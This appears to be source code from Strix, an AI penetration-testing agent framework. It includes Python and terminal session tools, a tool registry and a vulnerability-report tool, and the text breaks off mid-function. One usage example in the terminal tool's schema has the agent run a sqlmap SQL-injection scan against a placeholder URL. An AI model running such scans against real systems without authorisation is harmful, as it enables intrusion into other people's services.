self.shell.init_completer()
self.shell.init_history()
self.shell.init_logger()
self._setup_proxy_functions()
def _setup_proxy_functions(self) -> None:
try:
from strix.tools.proxy import proxy_actions
proxy_functions = [
"list_requests",
"list_sitemap",
"repeat_request",
"scope_rules",
"send_request",
"view_request",
"view_sitemap_entry",
]
proxy_dict = {name: getattr(proxy_actions, name) for name in proxy_functions}
self.shell.user_ns.update(proxy_dict)
except ImportError:
pass
def _validate_session(self) -> dict[str, Any] | None:
if not self.is_running:
return {
"session_id": self.session_id,
"stdout": "",
"stderr": "Session is not running",
"result": None,
}
return None
def _setup_execution_environment(self, timeout: int) -> tuple[Any, io.StringIO, io.StringIO]:
stdout_capture = io.StringIO()
stderr_capture = io.StringIO()
def timeout_handler(signum: int, frame: Any) -> None:
raise TimeoutError(f"Code execution timed out after {timeout} seconds")
old_handler = signal.signal(signal.SIGALRM, timeout_handler)
signal.alarm(timeout)
sys.stdout = stdout_capture
sys.stderr = stderr_capture
return old_handler, stdout_capture, stderr_capture
def _cleanup_execution_environment(
self, old_handler: Any, old_stdout: Any, old_stderr: Any
) -> None:
signal.signal(signal.SIGALRM, old_handler)
sys.stdout = old_stdout
sys.stderr = old_stderr
def _truncate_output(self, content: str, max_length: int, suffix: str) -> str:
if len(content) > max_length:
return content[:max_length] + suffix
return content
def _format_execution_result(
self, execution_result: Any, stdout_content: str, stderr_content: str
) -> dict[str, Any]:
stdout = self._truncate_output(
stdout_content, MAX_STDOUT_LENGTH, "... [stdout truncated at 10k chars]"
)
if execution_result.result is not None:
if stdout and not stdout.endswith("\n"):
stdout += "\n"
result_repr = repr(execution_result.result)
result_repr = self._truncate_output(
result_repr, MAX_STDOUT_LENGTH, "... [result truncated at 10k chars]"
)
stdout += result_repr
stdout = self._truncate_output(
stdout, MAX_STDOUT_LENGTH, "... [output truncated at 10k chars]"
)
stderr_content = stderr_content if stderr_content else ""
stderr_content = self._truncate_output(
stderr_content, MAX_STDERR_LENGTH, "... [stderr truncated at 5k chars]"
)
if (
execution_result.error_before_exec or execution_result.error_in_exec
) and not stderr_content:
stderr_content = "Execution error occurred"
return {
"session_id": self.session_id,
"stdout": stdout,
"stderr": stderr_content,
"result": repr(execution_result.result)
if execution_result.result is not None
else None,
}
def _handle_execution_error(self, error: BaseException) -> dict[str, Any]:
error_msg = str(error)
error_msg = self._truncate_output(
error_msg, MAX_STDERR_LENGTH, "... [error truncated at 5k chars]"
)
return {
"session_id": self.session_id,
"stdout": "",
"stderr": error_msg,
"result": None,
}
def execute_code(self, code: str, timeout: int = 30) -> dict[str, Any]:
session_error = self._validate_session()
if session_error:
return session_error
with self._execution_lock:
old_stdout, old_stderr = sys.stdout, sys.stderr
try:
old_handler, stdout_capture, stderr_capture = self._setup_execution_environment(
timeout
)
try:
execution_result = self.shell.run_cell(code, silent=False, store_history=True)
signal.alarm(0)
return self._format_execution_result(
execution_result, stdout_capture.getvalue(), stderr_capture.getvalue()
)
except (TimeoutError, KeyboardInterrupt, SystemExit) as e:
signal.alarm(0)
return self._handle_execution_error(e)
finally:
self._cleanup_execution_environment(old_handler, old_stdout, old_stderr)
def close(self) -> None:
self.is_running = False
self.shell.reset(new_session=False)
def is_alive(self) -> bool:
return self.is_running
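The SIGALRM-based timeout that `_setup_execution_environment` installs and `execute_code` relies on can be isolated into a small stdlib-only sketch (`run_with_timeout` is a hypothetical helper for illustration, not part of this module; it works on Unix and only from the main thread, which is where SIGALRM handlers may be installed):

```python
import signal


def run_with_timeout(func, timeout_seconds):
    """Run func(), raising TimeoutError if it exceeds timeout_seconds.

    Main-thread only: signal handlers cannot be installed from other threads.
    """
    def _handler(signum, frame):
        raise TimeoutError(f"timed out after {timeout_seconds}s")

    old_handler = signal.signal(signal.SIGALRM, _handler)
    signal.alarm(timeout_seconds)
    try:
        return func()
    finally:
        signal.alarm(0)  # cancel any pending alarm
        signal.signal(signal.SIGALRM, old_handler)  # restore previous handler


print(run_with_timeout(lambda: 2 + 2, 5))  # 4
```

Cancelling the alarm and restoring the previous handler in `finally` mirrors what `_cleanup_execution_environment` does, so a timeout in one execution cannot leak into the next.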


@@ -0,0 +1,131 @@
import atexit
import contextlib
import signal
import sys
import threading
from typing import Any
from .python_instance import PythonInstance
class PythonSessionManager:
def __init__(self) -> None:
self.sessions: dict[str, PythonInstance] = {}
self._lock = threading.Lock()
self.default_session_id = "default"
self._register_cleanup_handlers()
def create_session(
self, session_id: str | None = None, initial_code: str | None = None, timeout: int = 30
) -> dict[str, Any]:
if session_id is None:
session_id = self.default_session_id
with self._lock:
if session_id in self.sessions:
raise ValueError(f"Python session '{session_id}' already exists")
session = PythonInstance(session_id)
self.sessions[session_id] = session
if initial_code:
result = session.execute_code(initial_code, timeout)
result["message"] = (
f"Python session '{session_id}' created successfully with initial code"
)
else:
result = {
"session_id": session_id,
"message": f"Python session '{session_id}' created successfully",
}
return result
def execute_code(
self, session_id: str | None = None, code: str | None = None, timeout: int = 30
) -> dict[str, Any]:
if session_id is None:
session_id = self.default_session_id
if not code:
raise ValueError("No code provided for execution")
with self._lock:
if session_id not in self.sessions:
raise ValueError(f"Python session '{session_id}' not found")
session = self.sessions[session_id]
result = session.execute_code(code, timeout)
result["message"] = f"Code executed in session '{session_id}'"
return result
def close_session(self, session_id: str | None = None) -> dict[str, Any]:
if session_id is None:
session_id = self.default_session_id
with self._lock:
if session_id not in self.sessions:
raise ValueError(f"Python session '{session_id}' not found")
session = self.sessions.pop(session_id)
session.close()
return {
"session_id": session_id,
"message": f"Python session '{session_id}' closed successfully",
"is_running": False,
}
def list_sessions(self) -> dict[str, Any]:
with self._lock:
session_info = {}
for sid, session in self.sessions.items():
session_info[sid] = {
"is_running": session.is_running,
"is_alive": session.is_alive(),
}
return {"sessions": session_info, "total_count": len(session_info)}
def cleanup_dead_sessions(self) -> None:
with self._lock:
dead_sessions = []
for sid, session in self.sessions.items():
if not session.is_alive():
dead_sessions.append(sid)
for sid in dead_sessions:
session = self.sessions.pop(sid)
with contextlib.suppress(Exception):
session.close()
def close_all_sessions(self) -> None:
with self._lock:
sessions_to_close = list(self.sessions.values())
self.sessions.clear()
for session in sessions_to_close:
with contextlib.suppress(Exception):
session.close()
def _register_cleanup_handlers(self) -> None:
atexit.register(self.close_all_sessions)
signal.signal(signal.SIGTERM, self._signal_handler)
signal.signal(signal.SIGINT, self._signal_handler)
if hasattr(signal, "SIGHUP"):
signal.signal(signal.SIGHUP, self._signal_handler)
def _signal_handler(self, _signum: int, _frame: Any) -> None:
self.close_all_sessions()
sys.exit(0)
_python_session_manager = PythonSessionManager()
def get_python_session_manager() -> PythonSessionManager:
return _python_session_manager
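`PythonSessionManager` is an instance of a generic pattern: a lock-guarded registry keyed by session ID, with a fallback to a default ID. A minimal standalone sketch of that pattern (the `Registry` class and its method names are hypothetical, not the project's API):

```python
import threading


class Registry:
    """Lock-guarded mapping of session IDs to session objects, with a default key."""

    def __init__(self, default_id="default"):
        self._items = {}
        self._lock = threading.Lock()
        self.default_id = default_id

    def create(self, session_id=None, factory=dict):
        sid = session_id or self.default_id
        with self._lock:
            if sid in self._items:
                raise ValueError(f"session '{sid}' already exists")
            self._items[sid] = factory()  # factory stands in for PythonInstance
            return sid

    def get(self, session_id=None):
        sid = session_id or self.default_id
        with self._lock:
            if sid not in self._items:
                raise ValueError(f"session '{sid}' not found")
            return self._items[sid]


reg = Registry()
reg.create()          # falls back to the "default" ID
reg.get()["x"] = 1    # state persists between lookups
print(reg.get()["x"])  # 1
```

Holding the lock only around dictionary access (not around long-running execution) is the same trade-off the real manager makes with its per-session `_execution_lock`.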

strix/tools/registry.py Normal file

@@ -0,0 +1,196 @@
import inspect
import logging
import os
from collections.abc import Callable
from functools import wraps
from inspect import signature
from pathlib import Path
from typing import Any
tools: list[dict[str, Any]] = []
_tools_by_name: dict[str, Callable[..., Any]] = {}
logger = logging.getLogger(__name__)
class ImplementedInClientSideOnlyError(Exception):
def __init__(
self,
message: str = "This tool is implemented in the client side only",
) -> None:
self.message = message
super().__init__(self.message)
def _process_dynamic_content(content: str) -> str:
if "{{DYNAMIC_MODULES_DESCRIPTION}}" in content:
try:
from strix.prompts import generate_modules_description
modules_description = generate_modules_description()
content = content.replace("{{DYNAMIC_MODULES_DESCRIPTION}}", modules_description)
except ImportError:
logger.warning("Could not import prompts utilities for dynamic schema generation")
content = content.replace(
"{{DYNAMIC_MODULES_DESCRIPTION}}",
"List of prompt modules to load for this agent (max 3). Module discovery failed.",
)
return content
def _load_xml_schema(path: Path) -> Any:
if not path.exists():
return None
try:
content = path.read_text()
content = _process_dynamic_content(content)
start_tag = '<tool name="'
end_tag = "</tool>"
tools_dict = {}
pos = 0
while True:
start_pos = content.find(start_tag, pos)
if start_pos == -1:
break
name_start = start_pos + len(start_tag)
name_end = content.find('"', name_start)
if name_end == -1:
break
tool_name = content[name_start:name_end]
end_pos = content.find(end_tag, name_end)
if end_pos == -1:
break
end_pos += len(end_tag)
tool_element = content[start_pos:end_pos]
tools_dict[tool_name] = tool_element
pos = end_pos
if pos >= len(content):
break
except (IndexError, ValueError, UnicodeError) as e:
logger.warning(f"Error loading schema file {path}: {e}")
return None
else:
return tools_dict
def _get_module_name(func: Callable[..., Any]) -> str:
module = inspect.getmodule(func)
if not module:
return "unknown"
module_name = module.__name__
if ".tools." in module_name:
parts = module_name.split(".tools.")[-1].split(".")
if len(parts) >= 1:
return parts[0]
return "unknown"
def register_tool(
func: Callable[..., Any] | None = None, *, sandbox_execution: bool = True
) -> Callable[..., Any]:
def decorator(f: Callable[..., Any]) -> Callable[..., Any]:
func_dict = {
"name": f.__name__,
"function": f,
"module": _get_module_name(f),
"sandbox_execution": sandbox_execution,
}
sandbox_mode = os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "true"
if not sandbox_mode:
try:
module_path = Path(inspect.getfile(f))
schema_file_name = f"{module_path.stem}_schema.xml"
schema_path = module_path.parent / schema_file_name
xml_tools = _load_xml_schema(schema_path)
if xml_tools is not None and f.__name__ in xml_tools:
func_dict["xml_schema"] = xml_tools[f.__name__]
else:
func_dict["xml_schema"] = (
f'<tool name="{f.__name__}">'
"<description>Schema not found for tool.</description>"
"</tool>"
)
except (TypeError, FileNotFoundError) as e:
logger.warning(f"Error loading schema for {f.__name__}: {e}")
func_dict["xml_schema"] = (
f'<tool name="{f.__name__}">'
"<description>Error loading schema.</description>"
"</tool>"
)
tools.append(func_dict)
_tools_by_name[str(func_dict["name"])] = f
@wraps(f)
def wrapper(*args: Any, **kwargs: Any) -> Any:
return f(*args, **kwargs)
return wrapper
if func is None:
return decorator
return decorator(func)
def get_tool_by_name(name: str) -> Callable[..., Any] | None:
return _tools_by_name.get(name)
def get_tool_names() -> list[str]:
return list(_tools_by_name.keys())
def needs_agent_state(tool_name: str) -> bool:
tool_func = get_tool_by_name(tool_name)
if not tool_func:
return False
sig = signature(tool_func)
return "agent_state" in sig.parameters
def should_execute_in_sandbox(tool_name: str) -> bool:
for tool in tools:
if tool.get("name") == tool_name:
return bool(tool.get("sandbox_execution", True))
return True
def get_tools_prompt() -> str:
tools_by_module: dict[str, list[dict[str, Any]]] = {}
for tool in tools:
module = tool.get("module", "unknown")
if module not in tools_by_module:
tools_by_module[module] = []
tools_by_module[module].append(tool)
xml_sections = []
for module, module_tools in sorted(tools_by_module.items()):
tag_name = f"{module}_tools"
section_parts = [f"<{tag_name}>"]
for tool in module_tools:
tool_xml = tool.get("xml_schema", "")
if tool_xml:
indented_tool = "\n".join(f" {line}" for line in tool_xml.split("\n"))
section_parts.append(indented_tool)
section_parts.append(f"</{tag_name}>")
xml_sections.append("\n".join(section_parts))
return "\n\n".join(xml_sections)
def clear_registry() -> None:
tools.clear()
_tools_by_name.clear()
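`register_tool` uses the standard optional-argument decorator shape, which supports both bare `@register_tool` and parameterized `@register_tool(sandbox_execution=False)` usage. A stripped-down sketch of that shape (the `register`/`tools` names below are illustrative, not the module's actual registry):

```python
from functools import wraps

tools = {}


def register(func=None, *, sandbox=True):
    """Usable both bare (@register) and with arguments (@register(sandbox=False))."""
    def decorator(f):
        tools[f.__name__] = {"function": f, "sandbox": sandbox}

        @wraps(f)  # preserve __name__/__doc__ of the wrapped tool
        def wrapper(*args, **kwargs):
            return f(*args, **kwargs)

        return wrapper

    if func is None:           # called as @register(...): return the real decorator
        return decorator
    return decorator(func)     # called as bare @register: decorate immediately


@register
def ping():
    return "pong"


@register(sandbox=False)
def report():
    return "ok"


print(ping(), tools["report"]["sandbox"])  # pong False
```

The `func is None` check is what lets a single function serve as both decorator and decorator factory, exactly as in `register_tool` above.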


@@ -0,0 +1,6 @@
from .reporting_actions import create_vulnerability_report
__all__ = [
"create_vulnerability_report",
]


@@ -0,0 +1,63 @@
from typing import Any
from strix.tools.registry import register_tool
@register_tool(sandbox_execution=False)
def create_vulnerability_report(
title: str,
content: str,
severity: str,
) -> dict[str, Any]:
validation_error = None
if not title or not title.strip():
validation_error = "Title cannot be empty"
elif not content or not content.strip():
validation_error = "Content cannot be empty"
elif not severity or not severity.strip():
validation_error = "Severity cannot be empty"
else:
valid_severities = ["critical", "high", "medium", "low", "info"]
if severity.lower() not in valid_severities:
validation_error = (
f"Invalid severity '{severity}'. Must be one of: {', '.join(valid_severities)}"
)
if validation_error:
return {"success": False, "message": validation_error}
try:
from strix.cli.tracer import get_global_tracer
tracer = get_global_tracer()
if tracer:
report_id = tracer.add_vulnerability_report(
title=title,
content=content,
severity=severity,
)
return {
"success": True,
"message": f"Vulnerability report '{title}' created successfully",
"report_id": report_id,
"severity": severity.lower(),
}
import logging
logging.warning("Global tracer not available - vulnerability report not stored")
return { # noqa: TRY300
"success": True,
"message": f"Vulnerability report '{title}' created successfully (not persisted)",
"warning": "Report could not be persisted - tracer unavailable",
}
except ImportError:
return {
"success": True,
"message": f"Vulnerability report '{title}' created successfully (not persisted)",
"warning": "Report could not be persisted - tracer module unavailable",
}
except (ValueError, TypeError) as e:
return {"success": False, "message": f"Failed to create vulnerability report: {e!s}"}


@@ -0,0 +1,30 @@
<tools>
<tool name="create_vulnerability_report">
<description>Create a vulnerability report for a discovered security issue.
Use this tool to document a specific verified security vulnerability.
Put ALL details in the content field - affected URLs, parameters, proof of concept, remediation steps, CVE references, CVSS scores, technical details, impact assessment, etc.
DO NOT USE:
- For general security observations without specific vulnerabilities
- When you don't have concrete vulnerability details
- When you don't have a proof of concept, or are not yet 100% sure it's a vulnerability
- For tracking or reporting multiple vulnerabilities in one report; make a separate create_vulnerability_report call for each vulnerability
</description>
<parameters>
<parameter name="title" type="string" required="true">
<description>Clear, concise title of the vulnerability</description>
</parameter>
<parameter name="content" type="string" required="true">
<description>Complete vulnerability details including affected URLs, technical details, impact, proof of concept, remediation steps, and any relevant references. Be comprehensive and include everything relevant.</description>
</parameter>
<parameter name="severity" type="string" required="true">
<description>Severity level: critical, high, medium, low, or info</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing success status and message</description>
</returns>
</tool>
</tools>


@@ -0,0 +1,4 @@
from .terminal_actions import terminal_action
__all__ = ["terminal_action"]


@@ -0,0 +1,53 @@
from typing import Any, Literal
from strix.tools.registry import register_tool
from .terminal_manager import get_terminal_manager
TerminalAction = Literal["new_terminal", "send_input", "wait", "close"]
@register_tool
def terminal_action(
action: TerminalAction,
inputs: list[str] | None = None,
time: float | None = None,
terminal_id: str | None = None,
) -> dict[str, Any]:
def _validate_inputs(action_name: str, inputs: list[str] | None) -> None:
if not inputs:
raise ValueError(f"inputs parameter is required for {action_name} action")
def _validate_time(time_param: float | None) -> None:
if time_param is None:
raise ValueError("time parameter is required for wait action")
def _validate_action(action_name: str) -> None:
raise ValueError(f"Unknown action: {action_name}")
manager = get_terminal_manager()
try:
match action:
case "new_terminal":
return manager.create_terminal(terminal_id, inputs)
case "send_input":
_validate_inputs(action, inputs)
assert inputs is not None
return manager.send_input(terminal_id, inputs)
case "wait":
_validate_time(time)
assert time is not None
return manager.wait_terminal(terminal_id, time)
case "close":
return manager.close_terminal(terminal_id)
case _:
_validate_action(action) # type: ignore[unreachable]
except (ValueError, RuntimeError) as e:
return {"error": str(e), "terminal_id": terminal_id, "snapshot": "", "is_running": False}


@@ -0,0 +1,114 @@
<tools>
<tool name="terminal_action">
<description>Perform terminal actions using a terminal emulator instance. Each terminal instance
is PERSISTENT and remains active until explicitly closed, allowing for multi-step
workflows and long-running processes.</description>
<parameters>
<parameter name="action" type="string" required="true">
<description>The terminal action to perform: - new_terminal: Create a new terminal instance. This MUST be the first action for each terminal tab. - send_input: Send keyboard input to the specified terminal. - wait: Pause execution for specified number of seconds. Can be also used to get the current terminal state (screenshot, output, etc.) after using other tools. - close: Close the specified terminal instance. This MUST be the final action for each terminal tab.</description>
</parameter>
<parameter name="inputs" type="string" required="false">
<description>Required for 'new_terminal' and 'send_input' actions: - List of inputs to send to terminal. Each element in the list MUST be one of the following: - Regular text: "hello", "world", etc. - Literal text (not interpreted as special keys): prefix with "literal:" e.g., "literal:Home", "literal:Escape", "literal:Enter" to send these as text - Enter - Space - Backspace - Escape: "Escape", "^[", "C-[" - Tab: "Tab" - Arrow keys: "Left", "Right", "Up", "Down" - Navigation: "Home", "End", "PageUp", "PageDown" - Function keys: "F1" through "F12" Modifier keys supported with prefixes: - ^ or C- : Control (e.g., "^c", "C-c") - S- : Shift (e.g., "S-F6") - A- : Alt (e.g., "A-Home") - Combined modifiers for arrows: "S-A-Up", "C-S-Left" - Inputs MUST in all cases be sent as a LIST of strings, even if you are only sending one input. - Sending Inputs as a single string will NOT work.</description>
</parameter>
<parameter name="time" type="string" required="false">
<description>Required for 'wait' action. Number of seconds to pause execution. Can be fractional (e.g., 0.5 for half a second).</description>
</parameter>
<parameter name="terminal_id" type="string" required="false">
<description>Identifier for the terminal instance. Required for all actions except the first 'new_terminal' action. Allows managing multiple concurrent terminal tabs. - For 'new_terminal': if not provided, a default terminal is created. If provided, creates a new terminal with that ID. - For other actions: specifies which terminal instance to operate on. - Default terminal ID is "default" if not specified.</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - snapshot: raw representation of current terminal state where you can see the output of the command - terminal_id: the ID of the terminal instance that was operated on</description>
</returns>
<notes>
Important usage rules:
1. PERSISTENCE: Terminal instances remain active and maintain their state (environment
variables, current directory, running processes) until explicitly closed with the
'close' action. This allows for multi-step workflows across multiple tool calls.
2. MULTIPLE TERMINALS: You can run multiple terminal instances concurrently by using
different terminal_id values. Each terminal operates independently.
3. Terminal interaction MUST begin with 'new_terminal' action for each terminal instance.
4. Only one action can be performed per call.
5. Input handling:
- Regular text is sent as-is
- Literal text: prefix with "literal:" to send special key names as literal text
- Special keys must match supported key names
- Modifier combinations follow specific syntax
- Control can be specified as ^ or C- prefix
- Shift (S-) works with special keys only
- Alt (A-) works with any character/key
6. Wait action:
- Time is specified in seconds
- Can be used to wait for command completion
- Can be fractional (e.g., 0.5 seconds)
- Snapshot and output are captured after the wait
- You should estimate the time it will take to run the command and set the wait time accordingly.
- It can range from a few seconds to a few minutes; choose wisely based on the command you are running and the task.
7. The terminal can operate concurrently with other tools. You may invoke
browser, proxy, or other tools (in separate assistant messages) while maintaining
active terminal sessions.
8. You do not need to close terminals after you are done, but you can if you want to
free up resources.
9. You MUST end the inputs list with an "Enter" if you want to run the command, as
it is not sent automatically.
10. AUTOMATIC SPACING BEHAVIOR:
- Consecutive regular text inputs have spaces automatically added between them
- This is helpful for shell commands: ["ls", "-la"] becomes "ls -la"
- This causes problems for compound commands: [":", "w", "q"] becomes ": w q"
- Use "literal:" prefix to bypass spacing: [":", "literal:wq"] becomes ":wq"
- Special keys (Enter, Space, etc.) and literal strings never trigger spacing
11. WHEN TO USE LITERAL PREFIX:
- Vim commands: [":", "literal:wq", "Enter"] instead of [":", "w", "q", "Enter"]
- Any sequence where exact character positioning matters
- When you need multiple characters sent as a single unit
12. Do NOT use terminal actions for file editing or writing. Use the replace_in_file,
write_to_file, or read_file tools instead.
</notes>
<examples>
# Create new terminal with Node.js (default terminal)
<function=terminal_action>
<parameter=action>new_terminal</parameter>
<parameter=inputs>["node", "Enter"]</parameter>
</function>
# Create a second (parallel) terminal instance for Python
<function=terminal_action>
<parameter=action>new_terminal</parameter>
<parameter=terminal_id>python_terminal</parameter>
<parameter=inputs>["python3", "Enter"]</parameter>
</function>
# Send command to the default terminal
<function=terminal_action>
<parameter=action>send_input</parameter>
<parameter=inputs>["require('crypto').randomBytes(1000000).toString('hex')",
"Enter"]</parameter>
</function>
# Wait for previous action on default terminal
<function=terminal_action>
<parameter=action>wait</parameter>
<parameter=time>2.0</parameter>
</function>
# Send multiple inputs with special keys to current terminal
<function=terminal_action>
<parameter=action>send_input</parameter>
<parameter=inputs>["sqlmap -u 'http://example.com/page.php?id=1' --batch", "Enter", "y",
"Enter", "n", "Enter", "n", "Enter"]</parameter>
</function>
# WRONG: Vim command with automatic spacing (becomes ": w q")
<function=terminal_action>
<parameter=action>send_input</parameter>
<parameter=inputs>[":", "w", "q", "Enter"]</parameter>
</function>
# CORRECT: Vim command using literal prefix (becomes ":wq")
<function=terminal_action>
<parameter=action>send_input</parameter>
<parameter=inputs>[":", "literal:wq", "Enter"]</parameter>
</function>
</examples>
</tool>
</tools>
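The automatic-spacing rule described in the notes above (spaces between consecutive regular-text inputs, never around special keys or `literal:` items) can be modeled as a pure function. This is a hypothetical reimplementation for illustration only; it approximates plain-text detection and handles just a few special keys, not the tool's full key set:

```python
SPECIAL_KEYS = {"Enter", "Space", "Tab", "Escape", "Backspace",
                "Up", "Down", "Left", "Right", "Home", "End"}


def is_plain_text(item):
    """Regular text gets auto-spacing; special keys and literals do not."""
    return not item.startswith("literal:") and item not in SPECIAL_KEYS


def render(inputs):
    """Approximate the character stream the terminal receives for an input list."""
    out = []
    for i, item in enumerate(inputs):
        if item.startswith("literal:"):
            out.append(item[len("literal:"):])
        elif item == "Enter":
            out.append("\n")
        elif item == "Space":
            out.append(" ")
        else:
            out.append(item)
        # space only between two consecutive plain-text items
        if i + 1 < len(inputs) and is_plain_text(item) and is_plain_text(inputs[i + 1]):
            out.append(" ")
    return "".join(out)


print(repr(render(["ls", "-la", "Enter"])))        # 'ls -la\n'
print(repr(render([":", "literal:wq", "Enter"])))  # ':wq\n'
```

This reproduces the behavior called out in the notes: `["ls", "-la"]` becomes `ls -la`, while `[":", "literal:wq"]` stays `:wq`.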


@@ -0,0 +1,231 @@
import contextlib
import os
import pty
import select
import signal
import subprocess
import threading
import time
from typing import Any
import pyte
MAX_TERMINAL_SNAPSHOT_LENGTH = 10_000
class TerminalInstance:
def __init__(self, terminal_id: str, initial_command: str | None = None) -> None:
self.terminal_id = terminal_id
self.process: subprocess.Popen[bytes] | None = None
self.master_fd: int | None = None
self.is_running = False
self._output_lock = threading.Lock()
self._reader_thread: threading.Thread | None = None
self.screen = pyte.HistoryScreen(80, 24, history=1000)
self.stream = pyte.ByteStream()
self.stream.attach(self.screen)
self._start_terminal(initial_command)
def _start_terminal(self, initial_command: str | None = None) -> None:
try:
self.master_fd, slave_fd = pty.openpty()
shell = "/bin/bash"
self.process = subprocess.Popen( # noqa: S603
[shell, "-i"],
stdin=slave_fd,
stdout=slave_fd,
stderr=slave_fd,
cwd="/workspace",
preexec_fn=os.setsid, # noqa: PLW1509 - Required for PTY functionality
)
os.close(slave_fd)
self.is_running = True
self._reader_thread = threading.Thread(target=self._read_output, daemon=True)
self._reader_thread.start()
time.sleep(0.5)
if initial_command:
self._write_to_terminal(initial_command)
except (OSError, ValueError) as e:
raise RuntimeError(f"Failed to start terminal: {e}") from e
def _read_output(self) -> None:
while self.is_running and self.master_fd:
try:
ready, _, _ = select.select([self.master_fd], [], [], 0.1)
if ready:
data = os.read(self.master_fd, 4096)
if data:
with self._output_lock, contextlib.suppress(TypeError):
self.stream.feed(data)
else:
break
except (OSError, ValueError):
break
def _write_to_terminal(self, data: str) -> None:
if self.master_fd and self.is_running:
try:
os.write(self.master_fd, data.encode("utf-8"))
except (OSError, ValueError) as e:
raise RuntimeError("Terminal is no longer available") from e
def send_input(self, inputs: list[str]) -> None:
if not self.is_running:
raise RuntimeError("Terminal is not running")
for i, input_item in enumerate(inputs):
if input_item.startswith("literal:"):
literal_text = input_item[8:]
self._write_to_terminal(literal_text)
else:
key_sequence = self._get_key_sequence(input_item)
if key_sequence:
self._write_to_terminal(key_sequence)
else:
self._write_to_terminal(input_item)
time.sleep(0.05)
if (
i < len(inputs) - 1
and not input_item.startswith("literal:")
and not self._is_special_key(input_item)
and not inputs[i + 1].startswith("literal:")
and not self._is_special_key(inputs[i + 1])
):
self._write_to_terminal(" ")
def get_snapshot(self) -> dict[str, Any]:
with self._output_lock:
history_lines = [
"".join(char.data for char in line_dict.values())
for line_dict in self.screen.history.top
]
current_lines = self.screen.display
all_lines = history_lines + current_lines
rendered_output = "\n".join(all_lines)
if len(rendered_output) > MAX_TERMINAL_SNAPSHOT_LENGTH:
rendered_output = rendered_output[-MAX_TERMINAL_SNAPSHOT_LENGTH:]
truncated = True
else:
truncated = False
return {
"terminal_id": self.terminal_id,
"snapshot": rendered_output,
"is_running": self.is_running,
"process_id": self.process.pid if self.process else None,
"truncated": truncated,
}
def wait(self, duration: float) -> dict[str, Any]:
time.sleep(duration)
return self.get_snapshot()
def close(self) -> None:
self.is_running = False
if self.process:
with contextlib.suppress(OSError, ProcessLookupError):
os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
try:
self.process.wait(timeout=2)
except subprocess.TimeoutExpired:
os.killpg(os.getpgid(self.process.pid), signal.SIGKILL)
self.process.wait()
if self.master_fd:
with contextlib.suppress(OSError):
os.close(self.master_fd)
self.master_fd = None
if self._reader_thread and self._reader_thread.is_alive():
self._reader_thread.join(timeout=1)
def _is_special_key(self, key: str) -> bool:
special_keys = {
"Enter",
"Space",
"Backspace",
"Tab",
"Escape",
"Up",
"Down",
"Left",
"Right",
"Home",
"End",
"PageUp",
"PageDown",
"Insert",
"Delete",
} | {f"F{i}" for i in range(1, 13)}
if key in special_keys:
return True
return bool(key.startswith(("^", "C-", "S-", "A-")))
def _get_key_sequence(self, key: str) -> str | None:
key_map = {
"Enter": "\r",
"Space": " ",
"Backspace": "\x08",
"Tab": "\t",
"Escape": "\x1b",
"Up": "\x1b[A",
"Down": "\x1b[B",
"Right": "\x1b[C",
"Left": "\x1b[D",
"Home": "\x1b[H",
"End": "\x1b[F",
"PageUp": "\x1b[5~",
"PageDown": "\x1b[6~",
"Insert": "\x1b[2~",
"Delete": "\x1b[3~",
"F1": "\x1b[11~",
"F2": "\x1b[12~",
"F3": "\x1b[13~",
"F4": "\x1b[14~",
"F5": "\x1b[15~",
"F6": "\x1b[17~",
"F7": "\x1b[18~",
"F8": "\x1b[19~",
"F9": "\x1b[20~",
"F10": "\x1b[21~",
"F11": "\x1b[23~",
"F12": "\x1b[24~",
}
if key in key_map:
return key_map[key]
if key.startswith("^") and len(key) == 2:
char = key[1].lower()
return chr(ord(char) - ord("a") + 1) if "a" <= char <= "z" else None
if key.startswith("C-") and len(key) == 3:
char = key[2].lower()
return chr(ord(char) - ord("a") + 1) if "a" <= char <= "z" else None
return None
def is_alive(self) -> bool:
if not self.process:
return False
return self.process.poll() is None
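The control-character arithmetic in `_get_key_sequence` (`^c` mapping to byte 0x03) relies on the ASCII layout where Ctrl-A through Ctrl-Z occupy codes 1 through 26. A self-contained check of that mapping (`ctrl` is a hypothetical helper name):

```python
def ctrl(char):
    """Map a letter to its ASCII control character: ctrl('c') == chr(3) (Ctrl-C)."""
    char = char.lower()
    if not ("a" <= char <= "z"):
        raise ValueError("control mapping is defined for letters only")
    return chr(ord(char) - ord("a") + 1)


print(repr(ctrl("c")), repr(ctrl("a")))  # '\x03' '\x01'
```

This is the same expression the terminal code uses for both the `^x` and `C-x` prefixes; non-letter keys fall through to `None` there rather than raising.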


@@ -0,0 +1,191 @@
import atexit
import contextlib
import signal
import sys
import threading
from typing import Any

from .terminal_instance import TerminalInstance


class TerminalManager:
    def __init__(self) -> None:
        self.terminals: dict[str, TerminalInstance] = {}
        self._lock = threading.Lock()
        self.default_terminal_id = "default"
        self._register_cleanup_handlers()

    def create_terminal(
        self, terminal_id: str | None = None, inputs: list[str] | None = None
    ) -> dict[str, Any]:
        if terminal_id is None:
            terminal_id = self.default_terminal_id
        with self._lock:
            if terminal_id in self.terminals:
                raise ValueError(f"Terminal '{terminal_id}' already exists")
            # Pre-parse inputs into one shell command if the sequence ends with "Enter".
            initial_command = None
            if inputs:
                command_parts: list[str] = []
                for input_item in inputs:
                    if input_item == "Enter":
                        initial_command = " ".join(command_parts) + "\n"
                        break
                    if input_item.startswith("literal:"):
                        command_parts.append(input_item[8:])
                    elif input_item not in [
                        "Space",
                        "Tab",
                        "Backspace",
                    ]:
                        command_parts.append(input_item)
            try:
                terminal = TerminalInstance(terminal_id, initial_command)
                self.terminals[terminal_id] = terminal
                if inputs and not initial_command:
                    # Inputs that never hit "Enter" are replayed key by key instead.
                    terminal.send_input(inputs)
                    result = terminal.wait(2.0)
                else:
                    result = terminal.wait(1.0)
                result["message"] = f"Terminal '{terminal_id}' created successfully"
            except (OSError, ValueError, RuntimeError) as e:
                raise RuntimeError(f"Failed to create terminal '{terminal_id}': {e}") from e
            else:
                return result

    def send_input(
        self, terminal_id: str | None = None, inputs: list[str] | None = None
    ) -> dict[str, Any]:
        if terminal_id is None:
            terminal_id = self.default_terminal_id
        if not inputs:
            raise ValueError("No inputs provided")
        with self._lock:
            if terminal_id not in self.terminals:
                raise ValueError(f"Terminal '{terminal_id}' not found")
            terminal = self.terminals[terminal_id]
            try:
                terminal.send_input(inputs)
                result = terminal.wait(2.0)
